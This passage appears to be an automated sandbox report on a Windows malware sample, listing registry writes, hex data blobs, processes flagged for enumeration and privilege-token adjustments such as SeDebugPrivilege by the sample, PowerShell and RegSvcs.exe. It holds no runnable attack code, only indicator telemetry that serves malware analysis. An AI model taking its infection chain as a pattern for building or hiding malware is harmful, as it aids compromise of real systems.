00000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-647252928-2816094679-1307623958-1000\{D8C6EC2D-02F6-4C46-9AAC-159412B2C238}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133529978293055660"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070200420061007200510065007600690072000a004100620067002000660076007400610072007100200076006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000e42d0b27cf64da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3852	explorer.exe
3852	explorer.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
3396	Hyhueiwl.exe
3396	Hyhueiwl.exe
5196	RegSvcs.exe
5196	RegSvcs.exe
1912	chrome.exe
1912	chrome.exe
1112	powershell.exe
1368	Source.exe
1368	Source.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
3176	powershell.exe
4608	powershell.exe
4608	powershell.exe
5196	RegSvcs.exe
5196	RegSvcs.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3852	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeDebugPrivilege	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
Token: SeDebugPrivilege	3396	Hyhueiwl.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeDebugPrivilege	4312	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
Token: SeCreatePagefilePrivilege	3852	explorer.exe
Token: SeShutdownPrivilege	3852	explorer.exe
